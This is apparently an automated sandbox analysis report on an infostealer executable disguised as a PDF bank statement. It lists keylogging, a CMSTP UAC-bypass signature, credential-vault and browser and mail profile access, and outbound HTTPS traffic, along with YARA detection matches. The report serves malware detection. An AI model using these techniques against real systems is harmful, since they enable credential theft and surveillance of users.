                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49721 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49722 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49724 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49725 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49728 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to log keystrokes (.Net Source)
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, gmBpn1ecBmQ.cs.Net Code: trwhO
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, gmBpn1ecBmQ.cs.Net Code: trwhO
                        Installs a global keyboard hook
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: hesaphareketi-01.pdf.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.hesaphareketi-01.pdf.exe.7ff7341d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Source: 0.0.hesaphareketi-01.pdf.exe.7ff7341d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF Author: ditekSHen
                        Initial sample is a PE file and has a suspicious name
                        Source: initial sampleStatic PE information: Filename: hesaphareketi-01.pdf.exe
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7342005600_2_00007FF734200560
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341E8F500_2_00007FF7341E8F50
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341FC1600_2_00007FF7341FC160
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341FEB100_2_00007FF7341FEB10
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F8D400_2_00007FF7341F8D40
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341EFDA00_2_00007FF7341EFDA0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7342036000_2_00007FF734203600
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341D7EC00_2_00007FF7341D7EC0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7342027000_2_00007FF734202700
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F7F100_2_00007FF7341F7F10
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341E37200_2_00007FF7341E3720
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF734203F700_2_00007FF734203F70
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7342018000_2_00007FF734201800
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F30100_2_00007FF7341F3010
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341EF7F40_2_00007FF7341EF7F4
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F57F00_2_00007FF7341F57F0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F48900_2_00007FF7341F4890
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F88C00_2_00007FF7341F88C0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F40D00_2_00007FF7341F40D0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F29340_2_00007FF7341F2934
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7342089D00_2_00007FF7342089D0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341E69D00_2_00007FF7341E69D0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341F69D00_2_00007FF7341F69D0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7342022900_2_00007FF734202290
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341E2A600_2_00007FF7341E2A60
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341EE2F00_2_00007FF7341EE2F0
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341FF3600_2_00007FF7341FF360
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341FDC300_2_00007FF7341FDC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E541783_2_00E54178
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E5E5113_2_00E5E511
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E54A483_2_00E54A48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E5DC903_2_00E5DC90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00E53E303_2_00E53E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061D1BA83_2_061D1BA8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061D1BA63_2_061D1BA6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E7D783_2_061E7D78
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E55983_2_061E5598
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E65E83_2_061E65E8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061EB2283_2_061EB228
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E30503_2_061E3050
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061EC1883_2_061EC188
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E76983_2_061E7698
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E5CDB3_2_061E5CDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E23403_2_061E2340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061EE3A03_2_061EE3A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E00403_2_061E0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_061E00063_2_061E0006
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: String function: 00007FF7341D9B60 appears 51 times
                        Source: hesaphareketi-01.pdf.exeBinary or memory string: OriginalFilename vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000000.1208782135.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWriteLineAsyncd58ELEMENTTYPEINTERNAL.dllj% vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed430bae3-2e9e-4778-9cea-7bcd12b5f496.exe4 vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWriteLineAsyncd58ELEMENTTYPEINTERNAL.dllj% vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exeBinary or memory string: OriginalFilenameWriteLineAsyncd58ELEMENTTYPEINTERNAL.dllj% vs hesaphareketi-01.pdf.exe
                        Source: hesaphareketi-01.pdf.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: 0.2.hesaphareketi-01.pdf.exe.23682040090.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.hesaphareketi-01.pdf.exe.7ff7341d0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: 0.0.hesaphareketi-01.pdf.exe.7ff7341d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
                        Source: hesaphareketi-01.pdf.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9963167283298098
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, roEs93G.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, JQn0Aia1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.hesaphareketi-01.pdf.exe.2368207aac8.0.raw.unpack, YsrmZ97b.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@4/0@2/2
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeCode function: 0_2_00007FF7341E2890 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,0_2_00007FF7341E2890
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: hesaphareketi-01.pdf.exeReversingLabs: Detection: 34%
                        Source: hesaphareketi-01.pdf.exeVirustotal: Detection: 39%
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeFile read: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-01.pdf.exe "C:\Users\user\Desktop\hesaphareketi-01.pdf.exe"
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\hesaphareketi-01.pdf.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: hesaphareketi-01.pdf.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: hesaphareketi-01.pdf.exeStatic file information: File size 2066432 > 1048576
                        Source: hesaphareketi-01.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: hesaphareketi-01.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: hesaphareketi-01.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: hesaphareketi-01.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: hesaphareketi-01.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: hesaphareketi-01.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: hesaphareketi-01.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: hesaphareketi-01.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: hesaphareketi-01.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: hesaphareketi-01.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: hesaphareketi-01.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: hesaphareketi-01.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: hesaphareketi-01.pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: hesaphareketi-01.pdf.exeStatic PE information: section name: .managed
                        Source: hesaphareketi-01.pdf.exeStatic PE information: section name: hydrated
                        Source: hesaphareketi-01.pdf.exeStatic PE information: section name: _RDATA
